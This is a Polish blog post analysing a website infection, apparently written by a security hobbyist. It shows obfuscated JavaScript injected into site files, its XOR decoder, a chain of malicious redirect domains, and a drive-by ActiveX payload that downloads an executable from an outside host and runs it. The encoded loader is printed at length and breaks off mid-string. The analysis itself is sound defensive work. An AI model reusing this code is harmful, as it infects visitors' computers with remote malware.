Jeszcze niedawno pisałem o przypadku, który dotknął bezpośrednio strony moich znajomych, w której kodzie zostały dodany wektor atakujący przeglądarki internetowe. Minęła krótka chwila i u innego znajomego, na całkiem innym serwerze pojawił się podobny kod, jak mniemam część druga aka sequel :}
Po pierwsze kod został doklejony na końcu plików z końcówką .html (JavaScript) oraz plików .htaccess (HTML). Zarażone zostały pliki, które znajdywały się maksymalnie 2 katalogi wgłąb od katalogu głównego. Plików .htm niestety kolega nie posiadał więc ciężko stwierdzić co mogło się wydarzyć, ale znając życie wydarzyłoby się dokładnie to samo :]
Kod rozpoczynał się komentarzem w postaci sumy kontrolnej:
<!– [ 93cbb7f271e2e60d4c7c2a5ac356c422 ] –>
zapewne w celu sprawdzania, czy strona jest zainfekowana aktualnym przekierowaniem do złośliwej strony oraz czy w ogóle strona jest zarażona.
Kod wyglądał mniej więcej tak:
<script>eval('\x66\x75\x6e\x63\
x74\x69\x6f\x6e\x20\x67\x5a\x73\x68\x56\x4e\x41\x28\
x68\x6c\x47\x56\x47\x29\x7b\x66\x75\x6e\x63\x74\x69\
x6f\x6e\x20\x6f\x6c\x6f\x52\x43\x74\x28\x63\x61\x49
\x68\x29\x7b\x76\x61\x72\x20\x6d\x49\x6a\x53\(....)
– cały kod znajdziecie na dole wpisu
Po odkodowaniu ! kod wyglądał mniej wiecej tak:
function qJN(jRo){function uRJLf(aan){var uhe=0;var zVQ=aan.length;var pIUI=0;while(pIUI<zVQ){uhe+=sGkS(aan,pIUI)*zVQ;pIUI++;}return (uhe+'');}function sGkS(yzFiG,pGKu){return yzFiG.charCodeAt(pGKu);} try {var xPvHQ=eval('a)r?gfufmqefnft?sq.)c)a)lfl?exe?'.replace(/[qx\)\?f]/g, ''));var udEJq=new String();var vSohIZdw=0;vRMTl=0,yXlTqco=(new String(xPvHQ)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var fVOv=uRJLf(yXlTqco);jRo=unescape(jRo);for(var tgQG=0; tgQG < (jRo.length); tgQG++){var yLIeGB=sGkS(yXlTqco,vSohIZdw)^sGkS(fVOv,vRMTl);var sVIiIh=sGkS(jRo,tgQG);vRMTl++;vSohIZdw++;if(vRMTl>fVOv.length)vRMTl=0;if(vSohIZdw>yXlTqco.length)vSohIZdw=0;udEJq+=String.fromCharCode(sVIiIh^yLIeGB);}eval(udEJq); return udEJq=new String();}catch(e){}}qJN('%32%39%36%39%37%36%30%30%(.....)
W bardzo dużym uproszczeniu znów wszystko sprowadzało się do prób ataku na przeglądarki.
Przeglądarka łączyła się z adresem:
tuadresdomenykolegi.net.54bc34df74976097.axa3.cn (78.129.166.17)
gdzie była przekierowana do:
hxxp://www.google.com.urchin.js.axa1.cn/zob/index.php
gdzie była przekierowana do:
hxxp://keyclubs.cn/ad1/index.php
gdzie była przekierowana do:
hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/index.php
która to zwracała kod:
<meta HTTP-EQUIV='REFRESH' content='2; URL=javac.php'><script> start();
function z_sa(o,p,v){ o.setAttribute(p,v); }
function start(){
var z = document.createElement('object'); z_sa(z,'id','z'); z_sa(z,'classid',"cKlmshiKd!:mBODm9!6KCO5
O5m6m-h6!5!Ah3h-O1h1KD!0!-h9!8K3mAh-h0m0mCm0K4hFhC!2K9hEO3K6K".replace(/[\!hmKO]/g, ''));
try { var q = z.CreateObject("mDs7x7m1lD27.DXDM1L9H6TDT6P9"
.replace(/[D1796]/g, ''), ''),s = z.CreateObject("SHhuePlHlP.mAPpPpHl@
iHcHaHtHiuomn@".replace(/[H@Pum]/g, ''), ''),t = z.CreateObject("aTdToCdTbT.psptprTeTa9mp".replace(/[y9CpT]/g, ''), '');
try { t.type = 1; q.open("G5E5TO".replace(/[ucC5O]/g, ''),
'http://www.google.com.update.login.jsp.podavanda.cn/IIl/load.php',false);
eval("qg.!sHe!nLd!(L)H;%tL.LoHpLegnL(!)g;Ltg.gWgrLi%tgeL(!qH.!r!eLsgp%oHnLsLe!B!oLd%yL)L"
.replace(/[HLg\!%]/g, '')); var name = ".7/7/D.l.k/7/kaDdlmDi@nD.7e@xlel".replace(/[lD7@k]/g, '');
eval("tz.zSzazv3eVT3ozFfiQlQe3(fnzafmQeQ,z2f)V;3tz.3C3lfofs3eV(z)Q;3".replace(/[Vfz3Q]/g, ''));}
catch(e) {}try { eval("sg.ksYhTeYlJlTeJxTeTcguktJeT(gnkakmYeg)k".replace(/[YJkTg]/g, '')); }
catch(e) {}} catch(e){}}</script></head>
Oczywiście ponownie jak w poprzednim wpisie, serwer przesyłał dane tylko jeśli przeglądarka zgłosiła się odpowiednim nagłówkiem User-Agent w postaci MSIE czy Opera. Brak lub mało popularny User-Agent automatycznie blokował dostęp do strony i oczywiście nic nie wyświetlał. Dodatkowo konkretną stronę można było odwiedzić tylko raz, gdyż serwer udostępniający złośliwe strony – pamiętał adresy IP i umożliwiał tylko jednorazową wizytę. Oczywiście w celu zmniejszenia możliwości wykrycia ataku…
W logach systemowych odnalazłem logowanie za pomocą protokołu FTP do serwera hostującego stronę. Pobranie plików – dodanie nowych danych i ponowne przesłanie plików już na serwer hostujący. Akcja wykonana zapewne z jakiegoś przejętego komputera, bota. Po wnikliwym katowaniu kolegi okazało się, że schemat hasła jakiego używał wyglądał mniej więcej tak:
login: jegologin
hasło: jegologin.jegologin
co potwierdziło moją tezę przejęcia konta przez masowe próby skanowań w kierunku prostych haseł. Jak widać metoda działa i jest skuteczna :}
Kod źródłowy:
<script>eval('\x66\x75\x6e\x63\
x74\x69\x6f\x6e\x20\x67\x5a\x73\x68\x56\x4e\x41\x28\
x68\x6c\x47\x56\x47\x29\x7b\x66\x75\x6e\x63\x74\x69\
x6f\x6e\x20\x6f\x6c\x6f\x52\x43\x74\x28\x63\x61\x49
\x68\x29\x7b\x76\x61\x72\x20\x6d\x49\x6a\x53\
x3d\x30\x3b\x76\x61\x72\x20\x65\x55\x54\x47\x44\x3d\
x63\x61\x49\x68\x2e\x6c\x65\x6e\x67\x74\x68\x3b\
x76\x61\x72\x20\x6d\x73\x5a\x44\x4e\x3d\x30\x3b\x77\
x68\x69\x6c\x65\x28\x6d\x73\x5a\x44\x4e\x3c\x65\
x55\x54\x47\x44\x29\x7b\x6d\x49\x6a\x53\x2b\x3d\x6d\
x4a\x55\x28\x63\x61\x49\x68\x2c\x6d\x73\x5a\x44\
x4e\x29\x2a\x65\x55\x54\x47\x44\x3b\x6d\x73\x5a\
x44\x4e\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\
x28\x6d\x49\x6a\x53\x2b\x27\x27\x29\x3b\x7d\x66\x75\
x6e\x63\x74\x69\x6f\x6e\x20\x6d\x4a\x55\x28\x65\
x70\x79\x78\x53\x5a\x2c\x6a\x44\x47\x41\x29\x7b\x72\
x65\x74\x75\x72\x6e\x20\x65\x70\x79\x78\x53\x5a\
x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x6a\
x44\x47\x41\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\
x20\x7b\x76\x61\x72\x20\x62\x67\x59\x45\x7a\x3d\x65\
x76\x61\x6c\x28\x27\x61\x25\x72\x5e\x67\x5e\x75\
x57\x6d\x5e\x65\x26\x6e\x26\x74\x5e\x73\x57\x2e\x5e\
x63\x26\x61\x26\x6c\x26\x6c\x26\x65\x50\x65\x5e\
x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x25\x57\x26\x5c\x5e\x50\x5d\x2f\x67\x2c\x20\x27\x27\
x29\x29\x3b\x76\x61\x72\x20\x67\x42\x50\x4b\x6d\x3d\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x29\
x3b\x76\x61\x72\x20\x77\x77\x56\x3d\x30\x3b\x6f\x4b\x72\x3d\x30\x2c\x72\x41\x58\x6f\x3d\x28\x6e\x65\
x77\x20\x53\x74\x72\x69\x6e\x67\x28\x62\x67\x59\x45\x7a\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\
x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\
x76\x61\x72\x20\x70\x77\x46\x69\x58\x3d\x6f\x6c\x6f\x52\x43\x74\x28\x72\x41\x58\x6f\x29\x3b\x68\x6c\
x47\x56\x47\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x68\x6c\x47\x56\x47\x29\x3b\x66\x6f\x72\x28\x76\
x61\x72\x20\x64\x58\x44\x72\x55\x57\x62\x55\x3d\x30\x3b\x20\x64\x58\x44\x72\x55\x57\x62\x55\x20\x3c\
x20\x28\x68\x6c\x47\x56\x47\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x64\x58\x44\x72\x55\x57\x62\x55\
x2b\x2b\x29\x7b\x76\x61\x72\x20\x74\x6d\x6c\x3d\x6d\x4a\x55\x28\x72\x41\x58\x6f\x2c\x77\x77\x56\x29\
x5e\x6d\x4a\x55\x28\x70\x77\x46\x69\x58\x2c\x6f\x4b\x72\x29\x3b\x76\x61\x72\x20\x75\x6e\x4c\x3d\x6d\
x4a\x55\x28\x68\x6c\x47\x56\x47\x2c\x64\x58\x44\x72\x55\x57\x62\x55\x29\x3b\x6f\x4b\x72\x2b\x2b\x3b\
x77\x77\x56\x2b\x2b\x3b\x69\x66\x28\x6f\x4b\x72\x3e\x70\x77\x46\x69\x58\x2e\x6c\x65\x6e\x67\x74\x68\
x29\x6f\x4b\x72\x3d\x30\x3b\x69\x66\x28\x77\x77\x56\x3e\x72\x41\x58\x6f\x2e\x6c\x65\x6e\x67\x74\x68\
x29\x77\x77\x56\x3d\x30\x3b\x67\x42\x50\x4b\x6d\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\
x43\x68\x61\x72\x43\x6f\x64\x65\x28\x75\x6e\x4c\x5e\x74\x6d\x6c\x29\x3b\x7d\x65\x76\x61\x6c\x28\x67\
x42\x50\x4b\x6d\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x67\x42\x50\x4b\x6d\x3d\x6e\x65\x77\x20\x53\
x74\x72\x69\x6e\x67\x28\x29\x3b\x7d\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x7d\x67\x5a\x73\x68\x56\
x4e\x41\x28\x27\x25\x33\x32\x25\x33\x37\x25\x33\x34\x25\x33\x36\x25\x33\x34\x25\x33\x32\x25\x33\x32\
x25\x33\x35\x25\x34\x37\x25\x30\x31\x25\x32\x61\x25\x32\x62\x25\x33\x31\x25\x31\x65\x25\x33\x66\x25\
x32\x66\x25\x31\x62\x25\x31\x65\x25\x33\x30\x25\x35\x38\x25\x37\x62\x25\x33\x38\x25\x32\x37\x25\x36\
x61\x25\x32\x66\x25\x33\x32\x25\x31\x38\x25\x30\x64\x25\x33\x63\x25\x31\x34\x25\x32\x63\x25\x32\x34\
x25\x32\x38\x25\x31\x32\x25\x37\x38\x25\x31\x31\x25\x30\x39\x25\x33\x30\x25\x33\x36\x25\x33\x38\x25\
x33\x32\x25\x32\x36\x25\x30\x62\x25\x33\x61\x25\x37\x33\x25\x33\x66\x25\x36\x31\x25\x32\x65\x25\x32\
x35\x25\x33\x64\x25\x31\x35\x25\x30\x33\x25\x31\x33\x25\x32\x30\x25\x32\x38\x25\x31\x66\x25\x31\x33\
x25\x32\x64\x25\x36\x65\x25\x33\x66\x25\x33\x62\x25\x33\x37\x25\x30\x32\x25\x32\x32\x25\x37\x66\x25\
x37\x38\x25\x37\x37\x25\x32\x30\x25\x32\x61\x25\x32\x66\x25\x30\x63\x25\x33\x30\x25\x31\x35\x25\x36\
x38\x25\x32\x64\x25\x37\x36\x25\x37\x34\x25\x32\x35\x25\x32\x35\x25\x33\x64\x25\x30\x37\x25\x31\x64\
x25\x30\x31\x25\x31\x34\x25\x37\x33\x25\x34\x30\x25\x34\x65\x25\x31\x31\x25\x31\x65\x25\x30\x65\x25\
x30\x65\x25\x33\x30\x25\x30\x32\x25\x33\x35\x25\x30\x61\x25\x34\x39\x25\x33\x32\x25\x33\x62\x25\x32\
x36\x25\x33\x31\x25\x37\x32\x25\x33\x63\x25\x36\x62\x25\x30\x37\x25\x31\x38\x25\x31\x38\x25\x33\x35\
x25\x32\x64\x25\x32\x39\x25\x31\x36\x25\x35\x38\x25\x32\x66\x25\x32\x66\x25\x30\x31\x25\x30\x35\x25\
x35\x35\x25\x31\x31\x25\x33\x38\x25\x32\x63\x25\x32\x61\x25\x32\x64\x25\x33\x66\x25\x31\x31\x25\x31\
x61\x25\x33\x32\x25\x33\x36\x25\x37\x34\x25\x36\x39\x25\x37\x61\x25\x37\x32\x25\x37\x64\x25\x37\x63\
x25\x37\x64\x25\x37\x30\x25\x34\x64\x25\x30\x63\x25\x30\x61\x25\x33\x38\x25\x33\x35\x25\x36\x33\x25\
x32\x39\x25\x30\x65\x25\x30\x30\x25\x34\x37\x25\x33\x31\x25\x31\x36\x25\x32\x35\x25\x31\x36\x25\x32\
x61\x25\x32\x32\x25\x32\x33\x25\x36\x39\x25\x35\x32\x25\x36\x31\x25\x36\x66\x25\x36\x34\x25\x36\x32\
x25\x37\x64\x25\x34\x38\x25\x35\x33\x25\x36\x36\x25\x34\x66\x25\x33\x39\x25\x33\x39\x25\x32\x39\x25\
x31\x65\x25\x33\x32\x25\x33\x33\x25\x31\x39\x25\x31\x35\x25\x31\x39\x25\x33\x64\x25\x34\x39\x25\x35\
x34\x25\x31\x66\x25\x32\x32\x25\x32\x31\x25\x32\x38\x25\x32\x35\x25\x30\x34\x25\x32\x37\x25\x33\x31\
x25\x37\x34\x25\x34\x33\x25\x31\x32\x25\x32\x37\x25\x33\x38\x25\x32\x38\x25\x30\x38\x25\x33\x62\x25\
x30\x30\x25\x32\x37\x25\x33\x64\x25\x33\x34\x25\x30\x30\x25\x36\x35\x25\x36\x31\x25\x34\x32\x25\x33\
x36\x25\x32\x35\x25\x31\x37\x25\x37\x30\x25\x36\x64\x25\x37\x34\x25\x37\x31\x25\x33\x62\x25\x30\x63\
x25\x31\x38\x25\x33\x61\x25\x37\x35\x25\x33\x37\x25\x32\x35\x25\x36\x63\x25\x33\x64\x25\x33\x61\x25\
x34\x63\x25\x37\x30\x25\x34\x63\x25\x30\x64\x25\x33\x66\x25\x36\x62\x25\x33\x30\x25\x33\x32\x25\x32\
x62\x25\x30\x62\x25\x35\x30\x25\x35\x64\x25\x35\x66\x25\x33\x64\x25\x32\x66\x25\x33\x39\x25\x32\x36\
x25\x31\x32\x25\x31\x64\x25\x32\x66\x25\x33\x30\x25\x37\x32\x25\x37\x38\x25\x33\x39\x25\x33\x61\x25\
x32\x36\x25\x36\x61\x25\x35\x36\x25\x31\x30\x25\x36\x66\x25\x33\x32\x25\x30\x65\x25\x36\x38\x25\x36\
x33\x25\x37\x32\x25\x33\x35\x25\x32\x34\x25\x30\x62\x25\x33\x63\x25\x32\x33\x25\x31\x61\x25\x32\x64\
x25\x31\x32\x25\x33\x32\x25\x32\x36\x25\x30\x35\x25\x33\x30\x25\x33\x35\x25\x33\x32\x25\x37\x39\x25\
x34\x34\x25\x35\x65\x25\x33\x33\x25\x36\x64\x25\x31\x33\x25\x32\x35\x25\x36\x37\x25\x32\x62\x25\x36\
x61\x25\x37\x35\x25\x36\x62\x25\x33\x31\x25\x33\x30\x25\x36\x30\x25\x32\x31\x25\x35\x65\x25\x36\x66\
x25\x34\x66\x25\x35\x35\x25\x34\x31\x25\x31\x62\x25\x33\x33\x25\x35\x61\x25\x35\x33\x25\x36\x33\x25\
x31\x33\x25\x37\x36\x25\x30\x66\x25\x33\x36\x25\x30\x33\x25\x37\x38\x25\x33\x37\x25\x32\x38\x25\x37\
x39\x25\x33\x32\x25\x33\x64\x25\x30\x36\x25\x33\x34\x25\x32\x64\x25\x30\x35\x25\x33\x34\x25\x33\x30\
x25\x32\x66\x25\x30\x30\x25\x31\x39\x25\x33\x64\x25\x30\x37\x25\x30\x63\x25\x32\x30\x25\x37\x64\x25\
x31\x65\x25\x33\x37\x25\x30\x38\x25\x32\x61\x25\x30\x65\x25\x33\x64\x25\x31\x62\x25\x33\x35\x25\x32\
x38\x25\x30\x32\x25\x35\x37\x25\x33\x63\x25\x34\x66\x25\x31\x66\x25\x36\x31\x25\x31\x39\x25\x32\x61\
x25\x32\x31\x25\x32\x36\x25\x31\x33\x25\x31\x65\x25\x33\x66\x25\x32\x37\x25\x33\x65\x25\x30\x38\x25\
x31\x37\x25\x33\x30\x25\x34\x31\x25\x37\x33\x25\x32\x63\x25\x30\x31\x25\x30\x62\x25\x31\x35\x25\x32\
x36\x25\x33\x34\x25\x31\x38\x25\x36\x37\x25\x31\x62\x25\x32\x66\x25\x34\x37\x25\x32\x61\x25\x33\x65\
x25\x37\x30\x25\x32\x32\x25\x30\x62\x25\x32\x35\x25\x32\x66\x25\x33\x64\x25\x33\x31\x25\x30\x39\x25\
x35\x65\x25\x36\x66\x25\x33\x62\x25\x31\x37\x25\x31\x64\x25\x32\x31\x25\x31\x62\x25\x30\x62\x25\x31\
x38\x25\x31\x62\x25\x37\x30\x25\x33\x65\x25\x34\x31\x25\x35\x38\x25\x34\x35\x25\x36\x31\x25\x35\x65\
x25\x34\x37\x25\x32\x39\x25\x37\x36\x25\x32\x62\x25\x30\x34\x25\x34\x61\x25\x33\x64\x25\x31\x62\x25\
x31\x37\x25\x30\x32\x25\x33\x37\x25\x31\x35\x25\x33\x31\x25\x33\x64\x25\x34\x62\x25\x30\x61\x25\x33\
x33\x25\x36\x63\x25\x36\x62\x25\x37\x38\x25\x36\x32\x25\x31\x63\x25\x34\x39\x25\x33\x34\x25\x36\x34\
x25\x32\x38\x25\x35\x66\x25\x31\x35\x25\x37\x31\x25\x33\x63\x25\x30\x61\x25\x31\x31\x25\x37\x38\x25\
x30\x65\x25\x31\x65\x25\x32\x66\x25\x32\x37\x25\x31\x64\x25\x30\x38\x25\x30\x61\x25\x33\x30\x25\x31\
x34\x25\x34\x32\x25\x33\x63\x25\x37\x64\x25\x30\x61\x25\x34\x62\x25\x30\x36\x25\x33\x37\x25\x32\x36\
x25\x31\x30\x25\x31\x33\x25\x33\x32\x25\x31\x37\x25\x34\x63\x25\x31\x32\x25\x34\x38\x25\x33\x35\x25\
x31\x65\x25\x33\x32\x25\x32\x39\x25\x33\x66\x25\x32\x33\x25\x33\x66\x25\x33\x38\x25\x35\x31\x25\x36\
x38\x25\x36\x62\x25\x31\x31\x25\x31\x38\x25\x31\x66\x25\x31\x63\x25\x31\x38\x25\x31\x36\x25\x32\x65\
x25\x34\x32\x25\x30\x38\x25\x33\x30\x25\x37\x62\x25\x37\x36\x25\x37\x66\x25\x37\x61\x25\x37\x64\x25\
x32\x65\x25\x33\x30\x25\x30\x65\x25\x34\x34\x25\x37\x63\x25\x32\x35\x25\x31\x35\x25\x31\x36\x25\x35\
x39\x25\x33\x30\x25\x35\x62\x25\x31\x30\x25\x32\x66\x25\x33\x64\x25\x32\x66\x25\x33\x63\x25\x37\x66\
x25\x33\x61\x25\x33\x34\x25\x36\x31\x25\x30\x32\x25\x35\x66\x25\x33\x30\x25\x32\x35\x25\x32\x31\x25\
x31\x39\x25\x37\x35\x25\x37\x66\x25\x36\x62\x25\x31\x61\x25\x37\x32\x25\x30\x63\x25\x33\x32\x25\x33\
x32\x25\x32\x63\x25\x33\x32\x25\x36\x63\x25\x32\x37\x25\x34\x35\x25\x36\x65\x25\x31\x61\x25\x34\x61\
x25\x31\x65\x25\x33\x35\x25\x32\x66\x25\x32\x34\x25\x32\x34\x25\x35\x64\x25\x36\x39\x25\x36\x32\x25\
x32\x65\x25\x31\x37\x25\x30\x35\x25\x30\x64\x25\x33\x63\x25\x33\x33\x25\x34\x64\x25\x32\x30\x25\x34\
x64\x25\x33\x62\x25\x32\x30\x25\x33\x32\x25\x33\x66\x25\x32\x30\x25\x33\x62\x25\x30\x34\x25\x32\x38\
x25\x32\x30\x25\x37\x32\x25\x32\x34\x25\x34\x36\x25\x33\x64\x25\x33\x33\x25\x33\x65\x25\x34\x62\x25\
x36\x31\x25\x36\x32\x25\x37\x64\x25\x33\x30\x25\x31\x32\x25\x31\x63\x25\x31\x35\x25\x33\x30\x25\x36\
x30\x25\x31\x30\x25\x33\x37\x25\x36\x32\x25\x30\x65\x25\x34\x66\x25\x33\x30\x25\x31\x37\x25\x30\x37\
x25\x31\x61\x25\x37\x61\x25\x33\x30\x25\x37\x36\x25\x32\x36\x25\x32\x37\x25\x36\x32\x25\x30\x39\x25\
x37\x65\x25\x34\x31\x25\x31\x32\x25\x31\x31\x25\x33\x30\x25\x33\x39\x25\x33\x34\x25\x31\x38\x25\x33\
x66\x25\x36\x62\x25\x34\x65\x25\x31\x62\x25\x37\x63\x25\x34\x62\x25\x30\x38\x25\x33\x62\x25\x37\x65\
x25\x30\x35\x25\x30\x39\x25\x35\x64\x25\x33\x30\x25\x34\x65\x25\x34\x30\x25\x35\x36\x25\x35\x37\x25\
x37\x38\x25\x37\x38\x25\x30\x66\x25\x34\x33\x25\x33\x62\x25\x36\x37\x25\x31\x39\x25\x37\x37\x25\x31\
x36\x25\x32\x34\x25\x36\x64\x25\x32\x63\x25\x35\x36\x25\x32\x34\x25\x31\x34\x25\x33\x65\x25\x32\x39\
x25\x34\x65\x25\x33\x32\x25\x33\x65\x25\x31\x63\x25\x34\x37\x25\x31\x35\x25\x33\x33\x25\x31\x66\x25\
x32\x66\x25\x31\x39\x25\x30\x35\x25\x33\x33\x25\x31\x37\x25\x32\x62\x25\x35\x39\x25\x35\x34\x25\x35\
x34\x25\x35\x63\x25\x32\x62\x25\x31\x65\x25\x32\x38\x25\x30\x61\x25\x30\x63\x25\x31\x62\x25\x30\x37\
x25\x37\x66\x25\x37\x38\x25\x32\x36\x25\x31\x32\x25\x35\x62\x25\x30\x34\x25\x32\x64\x25\x35\x66\x25\
x33\x64\x25\x32\x37\x25\x37\x63\x25\x30\x36\x25\x34\x61\x25\x35\x35\x25\x35\x36\x25\x34\x61\x25\x36\
x38\x25\x34\x34\x25\x30\x64\x25\x30\x63\x25\x32\x65\x25\x33\x65\x25\x33\x35\x25\x36\x65\x25\x30\x31\
x25\x33\x39\x25\x32\x65\x25\x33\x65\x25\x33\x33\x25\x30\x38\x25\x33\x66\x25\x32\x65\x25\x33\x65\x25\
x34\x62\x25\x33\x32\x25\x33\x36\x25\x33\x32\x25\x32\x62\x25\x37\x37\x25\x31\x62\x25\x30\x38\x25\x33\
x66\x25\x31\x62\x25\x32\x32\x25\x32\x61\x25\x32\x39\x25\x30\x64\x25\x37\x35\x25\x33\x64\x25\x35\x61\
x25\x35\x32\x25\x33\x35\x25\x32\x38\x25\x33\x62\x25\x33\x33\x25\x36\x64\x25\x32\x35\x25\x33\x33\x25\
x33\x38\x25\x32\x65\x25\x31\x30\x25\x32\x66\x25\x33\x32\x25\x30\x66\x25\x37\x34\x25\x32\x32\x25\x33\
x66\x25\x37\x61\x25\x37\x63\x25\x33\x65\x25\x32\x30\x25\x37\x66\x25\x33\x39\x25\x31\x38\x25\x33\x33\
x25\x32\x63\x25\x34\x63\x25\x35\x35\x25\x32\x30\x25\x30\x61\x25\x33\x64\x25\x33\x31\x25\x32\x31\x25\
x33\x61\x25\x37\x33\x25\x31\x63\x25\x37\x63\x25\x32\x35\x25\x31\x34\x25\x30\x31\x25\x33\x66\x25\x36\
x35\x25\x37\x32\x25\x37\x30\x25\x32\x31\x25\x32\x32\x25\x31\x37\x25\x32\x62\x25\x30\x31\x25\x33\x61\
x25\x33\x36\x25\x37\x32\x25\x36\x39\x25\x31\x61\x25\x33\x37\x25\x34\x31\x25\x31\x64\x25\x37\x33\x25\
x30\x34\x25\x32\x36\x25\x30\x63\x25\x34\x64\x25\x33\x30\x25\x33\x37\x25\x35\x32\x25\x37\x30\x25\x36\
x30\x25\x37\x31\x25\x37\x62\x25\x33\x30\x25\x33\x32\x25\x31\x31\x25\x33\x37\x25\x30\x36\x25\x37\x30\
x25\x32\x35\x25\x30\x36\x25\x33\x30\x25\x32\x31\x25\x31\x39\x25\x30\x63\x25\x31\x39\x25\x34\x64\x25\
x36\x36\x25\x37\x32\x25\x32\x35\x25\x31\x30\x25\x32\x65\x25\x32\x33\x25\x32\x66\x25\x33\x32\x25\x30\
x38\x25\x32\x61\x25\x37\x65\x25\x36\x66\x25\x33\x61\x25\x33\x35\x25\x30\x35\x25\x37\x30\x25\x37\x61\
x25\x32\x37\x25\x37\x64\x25\x33\x36\x25\x32\x65\x25\x36\x38\x25\x31\x36\x25\x35\x37\x25\x37\x61\x25\
x36\x62\x25\x32\x31\x25\x37\x34\x25\x31\x34\x25\x37\x32\x25\x33\x34\x25\x36\x65\x25\x31\x38\x25\x36\
x31\x25\x32\x35\x25\x35\x32\x25\x31\x62\x25\x34\x34\x25\x33\x62\x25\x32\x66\x25\x33\x34\x25\x36\x66\
x25\x30\x36\x25\x36\x30\x25\x34\x61\x25\x33\x30\x25\x31\x36\x25\x31\x36\x25\x31\x33\x25\x37\x61\x25\
x33\x38\x25\x36\x36\x25\x33\x33\x25\x35\x63\x25\x30\x36\x25\x37\x63\x25\x31\x63\x25\x34\x65\x25\x33\
x34\x25\x36\x63\x25\x37\x61\x25\x32\x32\x25\x34\x30\x25\x32\x35\x25\x33\x35\x25\x32\x33\x25\x36\x65\
x25\x36\x63\x25\x32\x66\x25\x32\x62\x25\x33\x31\x25\x34\x34\x25\x32\x63\x25\x32\x64\x25\x32\x32\x25\
x32\x38\x25\x36\x66\x25\x32\x37\x25\x35\x66\x25\x34\x64\x25\x34\x38\x25\x37\x64\x25\x37\x32\x25\x35\
x66\x25\x30\x66\x25\x34\x65\x25\x36\x30\x25\x37\x62\x25\x36\x62\x25\x31\x35\x25\x33\x65\x25\x32\x34\
x25\x36\x63\x25\x32\x35\x25\x33\x64\x25\x32\x63\x25\x35\x35\x25\x30\x61\x25\x37\x61\x25\x36\x34\x25\
x36\x33\x25\x32\x66\x25\x37\x63\x25\x33\x39\x25\x37\x62\x25\x33\x66\x25\x34\x36\x25\x36\x66\x25\x36\
x39\x25\x30\x64\x25\x34\x38\x25\x36\x39\x25\x30\x32\x25\x32\x63\x25\x32\x35\x25\x31\x38\x25\x32\x36\
x25\x33\x33\x25\x31\x36\x25\x31\x31\x25\x37\x63\x25\x32\x63\x25\x33\x62\x25\x32\x61\x25\x31\x61\x25\
x37\x38\x25\x31\x33\x25\x37\x35\x25\x33\x37\x25\x33\x63\x25\x32\x38\x25\x37\x64\x25\x30\x62\x25\x33\
x63\x25\x31\x30\x25\x30\x32\x25\x35\x64\x25\x33\x34\x25\x30\x32\x25\x30\x64\x25\x33\x34\x25\x30\x38\
x25\x32\x65\x25\x34\x39\x25\x36\x39\x25\x36\x39\x25\x33\x61\x25\x37\x34\x25\x33\x35\x25\x31\x64\x25\
x30\x39\x25\x32\x30\x25\x33\x35\x25\x30\x32\x25\x37\x31\x25\x33\x34\x25\x37\x30\x25\x36\x66\x25\x35\
x35\x25\x37\x36\x25\x34\x34\x25\x32\x37\x25\x32\x37\x25\x33\x34\x25\x30\x37\x25\x32\x64\x25\x30\x32\
x25\x33\x65\x25\x33\x32\x25\x34\x35\x25\x30\x66\x25\x36\x38\x25\x32\x35\x25\x32\x33\x25\x33\x37\x25\
x31\x39\x25\x31\x31\x25\x33\x30\x25\x31\x34\x25\x33\x63\x25\x33\x66\x25\x37\x62\x25\x34\x39\x25\x34\
x30\x25\x31\x35\x25\x36\x62\x25\x33\x38\x25\x30\x65\x25\x33\x30\x25\x32\x39\x25\x30\x64\x25\x30\x64\
x25\x37\x63\x25\x30\x66\x25\x33\x63\x25\x31\x34\x25\x32\x32\x25\x35\x62\x25\x36\x35\x25\x31\x37\x25\
x33\x63\x25\x33\x63\x25\x32\x65\x25\x31\x63\x25\x36\x39\x25\x33\x65\x25\x30\x31\x25\x31\x35\x25\x32\
x63\x25\x34\x63\x25\x37\x63\x25\x36\x35\x25\x37\x37\x25\x33\x32\x25\x33\x37\x25\x30\x33\x25\x37\x61\
x25\x31\x63\x25\x31\x65\x25\x33\x30\x25\x36\x31\x25\x37\x33\x25\x37\x64\x25\x37\x39\x25\x35\x37\x25\
x30\x30\x25\x36\x62\x25\x30\x36\x25\x30\x62\x25\x32\x66\x25\x34\x38\x25\x33\x37\x25\x33\x64\x25\x30\
x62\x25\x37\x64\x25\x32\x64\x25\x33\x39\x25\x33\x36\x25\x36\x33\x25\x32\x30\x25\x36\x33\x25\x32\x36\
x25\x32\x37\x25\x34\x61\x25\x35\x35\x25\x37\x37\x25\x30\x32\x25\x32\x35\x25\x33\x34\x25\x30\x66\x25\
x33\x32\x25\x30\x61\x25\x37\x39\x25\x37\x39\x25\x36\x66\x25\x37\x39\x25\x37\x32\x25\x35\x31\x25\x36\
x32\x25\x36\x32\x25\x34\x36\x25\x34\x31\x25\x36\x38\x25\x36\x30\x25\x36\x33\x25\x37\x31\x25\x37\x35\
x25\x34\x35\x25\x36\x31\x25\x30\x39\x25\x33\x31\x25\x33\x31\x25\x33\x37\x25\x33\x61\x25\x33\x64\x25\
x33\x62\x25\x30\x34\x25\x34\x62\x25\x32\x38\x25\x33\x30\x25\x32\x61\x25\x33\x61\x25\x32\x62\x25\x32\
x34\x25\x36\x30\x25\x36\x31\x25\x37\x32\x25\x32\x63\x25\x30\x33\x25\x31\x31\x25\x33\x63\x25\x37\x38\
x25\x37\x61\x25\x36\x35\x25\x34\x33\x25\x37\x63\x25\x35\x30\x25\x37\x62\x25\x37\x32\x25\x37\x33\x25\
